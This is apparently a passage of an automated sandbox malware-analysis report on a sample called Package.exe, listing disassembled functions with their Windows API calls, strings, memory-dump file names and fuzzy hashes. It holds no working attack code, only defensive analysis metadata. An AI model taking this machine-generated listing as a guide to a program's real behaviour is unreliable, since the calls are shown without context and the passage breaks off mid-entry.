Part of subcall function 001FE941: __EH_prolog3.LIBCMT ref: 001FE948
Part of subcall function 001FE941: #489.MFC42U(0000008F,00000000,00000008,001FE8DA,00000004), ref: 001FE959
Part of subcall function 001FE941: #567.MFC42U(0000008F,00000000,00000008,001FE8DA,00000004), ref: 001FE973

Part of subcall function 001FE736: __EH_prolog3.LIBCMT ref: 001FE73D
Part of subcall function 001FE736: #489.MFC42U(00000090,00000000,00000008,001FE6BA,00000004), ref: 001FE74E
Part of subcall function 001FE736: #567.MFC42U(00000090,00000000,00000008,001FE6BA,00000004), ref: 001FE768

Part of subcall function 0020B460: __EH_prolog3.LIBCMT ref: 0020B467
Part of subcall function 0020B460: #489.MFC42U(0000008D,00000000,00000008,001FED96,00000090), ref: 0020B478
Part of subcall function 0020B460: #567.MFC42U(0000008D,00000000,00000008,001FED96,00000090), ref: 0020B492
Part of subcall function 0020B460: #567.MFC42U(0000008D,00000000,00000008,001FED96,00000090), ref: 0020B4AD

#497.MFC42U(001F21A0,?,00000000,00000090), ref: 001FEDAA
#771.MFC42U(001F21A0,?,00000000,00000090), ref: 001FEDB5
#1008.MFC42U(?,001F21A0,?,00000000,00000090), ref: 001FEDBD

Part of subcall function 0020D4CD: GetVersionExW.KERNEL32(?), ref: 0020D4F3

#1008.MFC42U(?,?,001F21A0,?,00000000,00000090), ref: 001FEDCE
#1008.MFC42U(?,?,?,001F21A0,?,00000000,00000090), ref: 001FEDDC

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #567H_prolog3$#1008#489$#497#498#771Version
String ID:
API String ID: 3371278394-0
Opcode ID: 7de9133a251348aa0b16a6c93f6dc3a2f32d9dba4beb9e9f439661bf75ea3af2
Instruction ID: 608ea6212efd071823f2715005e665402fcf7d1ecda5d055946b8dd5209e5908
Opcode Fuzzy Hash: 7de9133a251348aa0b16a6c93f6dc3a2f32d9dba4beb9e9f439661bf75ea3af2
Instruction Fuzzy Hash: 2C01B570A10349AADF15F7B08896BFDFBA57F54300F148455F504532D3DF705A649EA1

Function 00205F0E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00205F63
RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00205F9C
wsprintfW.USER32 ref: 00205FD4
RegOpenKeyW.ADVAPI32(?,?,?), ref: 00205FF1
RegCloseKey.ADVAPI32(?), ref: 00206006
RegQueryValueW.ADVAPI32(?,?,?,00000100), ref: 00206202
wsprintfW.USER32 ref: 00206231
#1083.MFC42U(?), ref: 002062E2
RegCloseKey.ADVAPI32(?), ref: 00206377

Strings

%s\Implemented Categories\%s, xrefs: 00205FC8
CLSID, xrefs: 00205F59

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CloseOpenwsprintf$#1083EnumQueryValue
String ID: %s\Implemented Categories\%s$CLSID
API String ID: 2375140502-1315529758
Opcode ID: 6bc0666c590a7741da59546a0e3a4b0829825bce0c5cdac4facbf17f0f353c74
Instruction ID: 0f3626d1b7c7602e21384f056647016c4cedc130be0fb25a613ec5dced60df83
Opcode Fuzzy Hash: 6bc0666c590a7741da59546a0e3a4b0829825bce0c5cdac4facbf17f0f353c74
Instruction Fuzzy Hash: 31110971D28229AAEB21DB61DC48BF9B3BCFB18741F0040D9A60DE1081D778ABA49F50

Function 00207C94 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00207E9A
RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00207EBD
#861.MFC42U(?), ref: 00207EDA
RegCloseKey.ADVAPI32(00000000,?), ref: 00207EEE

Strings

ToolboxBitmap32, xrefs: 00207E8F
ToolboxBitmap, xrefs: 00207EB2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: QueryValue$#861Close
String ID: ToolboxBitmap$ToolboxBitmap32
API String ID: 1198224557-4222126835
Opcode ID: ddab564346240f14541668b94c08fd1db41640d7e580afca9a9a7340eb27299b
Instruction ID: c8fa9ead1754c1a1a2b8c51f553b7bcd59a6e4fc45ea11262cd9100acffac212
Opcode Fuzzy Hash: ddab564346240f14541668b94c08fd1db41640d7e580afca9a9a7340eb27299b
Instruction Fuzzy Hash: 15014071A5121DDBCB64EF10DC8DBE977B8BF28305F0041E5A11AA21D2DB70AE94CF10

Function 00207CEB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00207E9A
RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00207EBD
#861.MFC42U(?), ref: 00207EDA
RegCloseKey.ADVAPI32(00000000,?), ref: 00207EEE

Strings

ToolboxBitmap32, xrefs: 00207E8F
ToolboxBitmap, xrefs: 00207EB2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: QueryValue$#861Close
String ID: ToolboxBitmap$ToolboxBitmap32
API String ID: 1198224557-4222126835
Opcode ID: 0ae299cf9fea8e84b0c26a62324e5606e956ad16d18f55a4851e4b191bd2c37a
Instruction ID: c8fa9ead1754c1a1a2b8c51f553b7bcd59a6e4fc45ea11262cd9100acffac212
Opcode Fuzzy Hash: 0ae299cf9fea8e84b0c26a62324e5606e956ad16d18f55a4851e4b191bd2c37a
Instruction Fuzzy Hash: 15014071A5121DDBCB64EF10DC8DBE977B8BF28305F0041E5A11AA21D2DB70AE94CF10

Function 00207D42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00207E9A
RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00207EBD
#861.MFC42U(?), ref: 00207EDA
RegCloseKey.ADVAPI32(00000000,?), ref: 00207EEE

Strings

ToolboxBitmap32, xrefs: 00207E8F
ToolboxBitmap, xrefs: 00207EB2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: QueryValue$#861Close
String ID: ToolboxBitmap$ToolboxBitmap32
API String ID: 1198224557-4222126835
Opcode ID: 48d9ebc7e6c82987cfc4a5903acb54206f7c7f99de5d28f246b67a04861e4a07
Instruction ID: c8fa9ead1754c1a1a2b8c51f553b7bcd59a6e4fc45ea11262cd9100acffac212
Opcode Fuzzy Hash: 48d9ebc7e6c82987cfc4a5903acb54206f7c7f99de5d28f246b67a04861e4a07
Instruction Fuzzy Hash: 15014071A5121DDBCB64EF10DC8DBE977B8BF28305F0041E5A11AA21D2DB70AE94CF10

Function 00207DF6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41registryCOMMON

Download Yara Rule

APIs

RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00207E9A
RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00207EBD
#861.MFC42U(?), ref: 00207EDA
RegCloseKey.ADVAPI32(00000000,?), ref: 00207EEE

Strings

ToolboxBitmap32, xrefs: 00207E8F
ToolboxBitmap, xrefs: 00207EB2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: QueryValue$#861Close
String ID: ToolboxBitmap$ToolboxBitmap32
API String ID: 1198224557-4222126835
Opcode ID: 7a4b99e16163c1a4f555ac4b6dc01c787609bbd6a02d5df2075488ef35a934df
Instruction ID: c8fa9ead1754c1a1a2b8c51f553b7bcd59a6e4fc45ea11262cd9100acffac212
Opcode Fuzzy Hash: 7a4b99e16163c1a4f555ac4b6dc01c787609bbd6a02d5df2075488ef35a934df
Instruction Fuzzy Hash: 15014071A5121DDBCB64EF10DC8DBE977B8BF28305F0041E5A11AA21D2DB70AE94CF10

Function 001FC800 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37windowCOMMON

Download Yara Rule

APIs

#4704.MFC42U ref: 001FC80D
SendMessageW.USER32(?,00001061,00000000,?), ref: 001FC838
SendMessageW.USER32(?,00001061,00000001,?), ref: 001FC85C

Strings

User/Group, xrefs: 001FC823
Can Access, xrefs: 001FC84E
j, xrefs: 001FC855

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: MessageSend$#4704
String ID: Can Access$User/Group$j
API String ID: 2927661609-2049629346
Opcode ID: 0b51f6be434b58e6c1cd0b34d286bce240f861d80b57a0e83005b33b5edb50a0
Instruction ID: 1a747ca8a7b3c48849ca2a32196ecf46088c5afc29f07f98d2ba6dc6ebb044bf
Opcode Fuzzy Hash: 0b51f6be434b58e6c1cd0b34d286bce240f861d80b57a0e83005b33b5edb50a0
Instruction Fuzzy Hash: E0F06D7190030CAFEF209FA5DC4DFEFBBB9EB85714F11041AE901B6280C7B559558AA1

Function 002093AF Relevance: 10.5, APIs: 7, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002093B6
#540.MFC42U(00000004,002099BF,?,?,?,00000000,00000000), ref: 002093C9
#540.MFC42U(00000004,002099BF,?,?,?,00000000,00000000), ref: 002093D5
#540.MFC42U(00000004,002099BF,?,?,?,00000000,00000000), ref: 002093E1
#858.MFC42U(?,00000004,002099BF,?,?,?,00000000,00000000), ref: 002093F0
#858.MFC42U(?,?,00000004,002099BF,?,?,?,00000000,00000000), ref: 002093FB
#858.MFC42U(?,?,?,00000004,002099BF,?,?,?,00000000,00000000), ref: 00209406

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #540#858$H_prolog3
String ID:
API String ID: 3210275551-0
Opcode ID: 40241efb87805af73430322de3609aa086af944b0f6dab018ac46e927d006b6b
Instruction ID: 6129d21fd0f7dea8a0aa6a80bbdd0a2b9a268c68e32565e2bd6ecd9eeaca904b
Opcode Fuzzy Hash: 40241efb87805af73430322de3609aa086af944b0f6dab018ac46e927d006b6b
Instruction Fuzzy Hash: 71F06D70421749DFCB14EF90C941B9EB7A0BF24714F00845CB5AA1B5D3DBB0AA28DF51

Function 00209419 Relevance: 10.5, APIs: 7, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00209420
#540.MFC42U(00000004,0020B222,?,?,TypeLib,?), ref: 00209433
#540.MFC42U(00000004,0020B222,?,?,TypeLib,?), ref: 0020943F
#540.MFC42U(00000004,0020B222,?,?,TypeLib,?), ref: 0020944B
#858.MFC42U(?,00000004,0020B222,?,?,TypeLib,?), ref: 0020945A
#861.MFC42U(001F21A0,?,00000004,0020B222,?,?,TypeLib,?), ref: 00209467
#858.MFC42U(?,001F21A0,?,00000004,0020B222,?,?,TypeLib,?), ref: 00209472

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #540$#858$#861H_prolog3
String ID:
API String ID: 117671327-0
Opcode ID: dc6530f2973163f335976efa13bfccf1ec9b1d733ad60b4a466cd45f125e876e
Instruction ID: 517efcf539dd105a71b9791f674904192f555b75a70eabe13ee773a9d843fa5d
Opcode Fuzzy Hash: dc6530f2973163f335976efa13bfccf1ec9b1d733ad60b4a466cd45f125e876e
Instruction Fuzzy Hash: 1FF06D70521745DBCB24FF90C942BAEB7A0BF24714F00845CB59A1B5D3DBB0AA68CF51

Function 00202AC0 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

#1662.MFC42U ref: 00202B02
#5596.MFC42U ref: 00202B2D
#5596.MFC42U ref: 00202B45
#861.MFC42U(001F21A0,00000000,0000000D), ref: 00202BB6
#6325.MFC42U(00000000,00000004,00000000,001F21A0,00000000,0000000D), ref: 00202BC4
#2644.MFC42U ref: 00202C14

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #5596$#1662#2644#6325#861
String ID:
API String ID: 4171677465-0
Opcode ID: 355fc95774cce95244c594f7cd0e588dfd2c90c4cea15caf6c7f24839d8c5902
Instruction ID: 2e458b1d84f3a8f209cdc762c2180d09078d659de407b5336bc8b2cae084257d
Opcode Fuzzy Hash: 355fc95774cce95244c594f7cd0e588dfd2c90c4cea15caf6c7f24839d8c5902
Instruction Fuzzy Hash: 1041CE34A11209EFDB14EFA4D99ABADB7B2AF94300F114065E506AB3E2CF716E50CF51

Function 00208F95 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

#1662.MFC42U ref: 00208FAE
#5596.MFC42U ref: 00208FD9
#5596.MFC42U ref: 00208FF1
#861.MFC42U(001F21A0), ref: 00209062
#6325.MFC42U(00000000,00000004,00000000,001F21A0), ref: 00209070
#2644.MFC42U ref: 002090C0

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #5596$#1662#2644#6325#861
String ID:
API String ID: 4171677465-0
Opcode ID: 413051209aba9647ecbf798ed539dffd6a23b3dae02642a0e7b628ee9ef58410
Instruction ID: a55b71878c19d63900146707c0b65aeb4f673f084536b21eca9d7f89cccfc931
Opcode Fuzzy Hash: 413051209aba9647ecbf798ed539dffd6a23b3dae02642a0e7b628ee9ef58410
Instruction Fuzzy Hash: F631FF34A11209AFCB14FBA4D95AAADB7B2AF94300F114065E506AB3E3CF706E50CF51

Function 001FE583 Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

#6211.MFC42U(?,0000130B,?,?,001FD5AA,00000000), ref: 001FE5BE
#6211.MFC42U(?,0000130B,?,?,001FD5AA,00000000), ref: 001FE5E8
#6211.MFC42U(?,0000130B,?,?,001FD5AA,00000000), ref: 001FE60B
#6211.MFC42U(?,0000130B,?,?,001FD5AA,00000000), ref: 001FE62E
#6211.MFC42U(?,0000130B,?,?,001FD5AA,00000000), ref: 001FE651
RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,001FD5AA,00000000), ref: 001FE669

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #6211$RedrawWindow
String ID:
API String ID: 4151937776-0
Opcode ID: 6b4f36e7594fa840bcd2820cd34f5f61c1507e65313d188cee8315fe8572988a
Instruction ID: 5b21df8c997f5723f92d2b1992c56285e92905a9c89cd98949364e1a917d7be9
Opcode Fuzzy Hash: 6b4f36e7594fa840bcd2820cd34f5f61c1507e65313d188cee8315fe8572988a
Instruction Fuzzy Hash: F3216F3002060DBACF359E25DC08DE77BB9EBA2734F028429F66A9807197719954DF60

Function 0020CD41 Relevance: 9.1, APIs: 6, Instructions: 66COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0020CD5F
free.MSVCRT ref: 0020CD71
free.MSVCRT ref: 0020CD83
free.MSVCRT ref: 0020CD95
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,0020CE02,00000000,00000000,00000000), ref: 0020CDB7
GetLastError.KERNEL32(00000000), ref: 0020CDC2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: free$DescriptorErrorInitializeLastSecurity
String ID:
API String ID: 1417453991-0
Opcode ID: d586bd5ae789da6124cd3412d94756ff671c84e38ebbb94161d0ea42e6943df9
Instruction ID: 4c6d79da978405b530c7dc7043ee8e63ae6dff8f6524712c6527c4c959decb94
Opcode Fuzzy Hash: d586bd5ae789da6124cd3412d94756ff671c84e38ebbb94161d0ea42e6943df9
Instruction Fuzzy Hash: 41114CB6424713DFD7306F65E884552BBF1EF543253329A3EE1AA865E2CB7098A0DB40

Function 001FD944 Relevance: 9.1, APIs: 6, Instructions: 64stringregistrywindowCOMMON

Download Yara Rule

APIs

RegQueryValueW.ADVAPI32(?,?,?,?), ref: 001FD979
lstrlenW.KERNEL32(?), ref: 001FD98A
lstrcpyW.KERNEL32(?,?), ref: 001FD9C1
wcsrchr.MSVCRT ref: 001FD9CF
#1165.MFC42U ref: 001FD9E0
ExtractIconW.SHELL32(?,?,00000000), ref: 001FD9F2

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #1165ExtractIconQueryValuelstrcpylstrlenwcsrchr
String ID:
API String ID: 2919050075-0
Opcode ID: af169027f3ac40d7315681fd7a8c93e117b48131bfaa68cc137858230abed2c7
Instruction ID: 2a8e56ffa6d20afdc8202593d41c5fe1002e1d3f8726b6d8add12e6512a34ab6
Opcode Fuzzy Hash: af169027f3ac40d7315681fd7a8c93e117b48131bfaa68cc137858230abed2c7
Instruction Fuzzy Hash: 47216DB650030CABCB24EBA5EC4DAEA77B9FF58314F108599E519D7091DBB09A84CB60

Function 6C4E235C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6C4E1E31,6C4E163B,6C4E104E,?,6C4E1286,?,00000001,?,?,00000001,?,6C4F4520,0000000C,6C4E137F), ref: 6C4E236A
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C4E2378
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C4E2391
SetLastError.KERNEL32(00000000,6C4E1286,?,00000001,?,?,00000001,?,6C4F4520,0000000C,6C4E137F,?,00000001,?), ref: 6C4E23E3

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b682574a068154f4585bc30ed3dce217cb4c0325e35e20cf68fa333a4f4d6727
Instruction ID: e64bd1a288c3755c1c2aa50a02c238032c16d9e318c3ad959d76f98fe120d058
Opcode Fuzzy Hash: b682574a068154f4585bc30ed3dce217cb4c0325e35e20cf68fa333a4f4d6727
Instruction Fuzzy Hash: 7401B57220D3176EE678E5756C88F8A2774EB4E77F732032DE52090BD0EF5248155A94

Function 001FF150 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001FF167
#3087.MFC42U(00001FA5,00000000), ref: 001FF17D
#2634.MFC42U(00001FA5,00000000), ref: 001FF184
SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001FF192
#3087.MFC42U(0000009C,00000000), ref: 001FF1A8
#2634.MFC42U(0000009C,00000000), ref: 001FF1AF

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #2634#3087MessageSend
String ID:
API String ID: 496076185-0
Opcode ID: e75b61f5b62212d212aa4caf87632055982dad83ff69fdd6b1a24b949430d62d
Instruction ID: e35a62200cef0d59a74a1018f6e7e007901f72c4923643bcd41624aad1bf7d94
Opcode Fuzzy Hash: e75b61f5b62212d212aa4caf87632055982dad83ff69fdd6b1a24b949430d62d
Instruction Fuzzy Hash: B5F08CB27103502BEB282B719C9EE6FA9ADDBC4B61F42482DF10AC61E2DE714D518625

Function 00200A74 Relevance: 9.0, APIs: 6, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

#693.MFC42U(?,001FD810,?,001FD83D), ref: 00200A85
#609.MFC42U(?,001FD810,?,001FD83D), ref: 00200A90
#609.MFC42U(?,001FD810,?,001FD83D), ref: 00200A9B
#609.MFC42U(?,001FD810,?,001FD83D), ref: 00200AA6
#609.MFC42U(?,001FD810,?,001FD83D), ref: 00200AAE

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #609$#693
String ID:
API String ID: 2192965535-0
Opcode ID: 54eba7c5b7708561b0192a2cebf4d20108a91b8a24ff6bfe115e6f608767b000
Instruction ID: 90cc4b89af959a00c1ac1b5b4c43ac3225ed880cb5a4d52869c321d2f86e586d
Opcode Fuzzy Hash: 54eba7c5b7708561b0192a2cebf4d20108a91b8a24ff6bfe115e6f608767b000
Instruction Fuzzy Hash: D4E01A740207129AC774FB30C4525F9BBA1AF20340F42896DA06B031A2AF602A99CF00

Function 6C4E7136 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Windows\Temp\Package.exe, xrefs: 6C4E7152

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID:
String ID: C:\Windows\Temp\Package.exe
API String ID: 0-234654675
Opcode ID: 9e4842328495a1fd4b29ea8e97fff9f82bc7525a2dd2b57f2a8ac75646f0f3e8
Instruction ID: 26f15d024e30d55379742886be4b0e6dba45e8e906abf65452d4bf06240baf9f
Opcode Fuzzy Hash: 9e4842328495a1fd4b29ea8e97fff9f82bc7525a2dd2b57f2a8ac75646f0f3e8
Instruction Fuzzy Hash: A5219271208305AFD714DFA5DC80D5AB7BAAF0D37B7064618E924C7B42DB30E812C7A0

Function 6C4E41F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

